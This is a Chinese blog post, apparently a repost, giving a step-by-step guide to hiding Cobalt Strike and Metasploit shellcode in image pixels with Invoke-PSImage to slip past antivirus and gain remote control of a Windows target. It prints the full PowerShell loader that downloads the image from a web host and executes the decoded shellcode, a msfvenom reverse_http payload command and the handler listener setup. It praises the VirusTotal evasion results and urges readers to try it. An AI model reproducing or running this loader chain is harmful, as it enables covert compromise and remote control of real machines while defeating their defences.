博客
关于我
shellcode隐写到像素RGB免杀上线到CS
阅读量:443 次
发布时间:2019-03-06

本文共 2024 字,大约阅读时间需要 6 分钟。

利用把Shellcode隐写到图片像素RGB进行免杀上线到CS

——by:chenw


0x01 前言


前几天跟一个朋友一起搞一个站的时候,发现那个站点开了很多杀软,使用CS的powershell马无法令其上线。后续在github上找到了一个可以把shellcode隐写到图片的RGB里,然后使其过杀软的检测上线到CS。

今天打算把这个免杀的过程进行一个记录。

0x02 本地环境


靶机:win7 IP:192.168.82.136

攻击机:fsec ip:192.168.82.134

0x03 步骤


0x03-1 CS平台使用步骤

  1. 首先,使用CS生成一个ps1文件:
  2. 去github上将免杀项目下载下来,链接:
    然后将刚才生成的ps1文件放在刚刚下载的项目内与Invoke-PSImage.ps1文件在同一目录:
    再准备一张图片用于生成一张带有Payload的图片:
  3. 之后在win7里使用命令生成一个带有shellcode的图片:
#1、设置执行策略Set-ExecutionPolicy Unrestricted -Scope CurrentUser#2、导入ps1文件Import-Module .\Invoke-PSimage.ps1#3、生成带有shellcode的图片Invoke-PSImage -Script .\payload.ps1 -Image .\shell.jpg -Out .\shell.png -Web

之后会得到这么一串代码:

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/shell.png"));$o=a Byte[] 4320;(0..3)|%{foreach($x in(0..1079)){$p=$g.GetPixel($x,$_);$o[$_*1080+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3554]))

并且会得到带有shellcode的图片shell.png:
接着将得到的shellcode里的"
hell.png"改为我们自己的http服务,这里我使用python3架起一个http服务,命令为:

python3 -m http.server 80

4. 最后来到win7运行该powershell,看CS上是否上线:
成功上线。叫上小伙伴来一起快乐的上号😏
把其放到virustotal上进行检测,结果如下:
免杀效果还是很nice的。

0x03-2 MSF平台使用步骤

  1. 首先使用msf生成一个ps1文件,命令如下:
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.82.134 LPORT=7788 -f psh-reflection > msf.ps1

后面老规矩,把它丢到与Invoke-PSImage.ps1文件在同一目录,后面操作相同,参考CS平台,生成带有shellcode的图片,然后放入前面架设的http服务内,进行区别,图片叫msf.png:
老规矩,将得到的ps代码里的地址改为自己vps的地址。
接着在fsec上进行监听:

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_http payload => windows/x64/meterpreter/reverse_httpmsf6 exploit(multi/handler) > set lhost 192.168.82.134lhost => 192.168.82.134msf6 exploit(multi/handler) > set lport 7799lport => 7799msf6 exploit(multi/handler) >

然后在靶机上运行该代码使其上线:
成功上线。

0x04 结尾


这么好用的免杀还不赶紧自己动手去试一试

0x05 免责声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

转载地址:http://reakz.baihongyu.com/

你可能感兴趣的文章
MYSQL中TINYINT的取值范围
查看>>
MySQL中UPDATE语句的神奇技巧,让你操作数据库如虎添翼!
查看>>
Mysql中varchar类型数字排序不对踩坑记录
查看>>
MySQL中一条SQL语句到底是如何执行的呢?
查看>>
MySQL中你必须知道的10件事,1.5万字!
查看>>
MySQL中使用IN()查询到底走不走索引?
查看>>
Mysql中使用存储过程插入decimal和时间数据递增的模拟数据
查看>>
MySql中关于geometry类型的数据_空的时候如何插入处理_需用null_空字符串插入会报错_Cannot get geometry object from dat---MySql工作笔记003
查看>>
mysql中出现Incorrect DECIMAL value: '0' for column '' at row -1错误解决方案
查看>>
mysql中出现Unit mysql.service could not be found 的解决方法
查看>>
mysql中出现update-alternatives: 错误: 候选项路径 /etc/mysql/mysql.cnf 不存在 dpkg: 处理软件包 mysql-server-8.0的解决方法(全)
查看>>
Mysql中各类锁的机制图文详细解析(全)
查看>>
MySQL中地理位置数据扩展geometry的使用心得
查看>>
Mysql中存储引擎简介、修改、查询、选择
查看>>
Mysql中存储过程、存储函数、自定义函数、变量、流程控制语句、光标/游标、定义条件和处理程序的使用示例
查看>>
mysql中实现rownum,对结果进行排序
查看>>
mysql中对于数据库的基本操作
查看>>
Mysql中常用函数的使用示例
查看>>
MySql中怎样使用case-when实现判断查询结果返回
查看>>
Mysql中怎样使用update更新某列的数据减去指定值
查看>>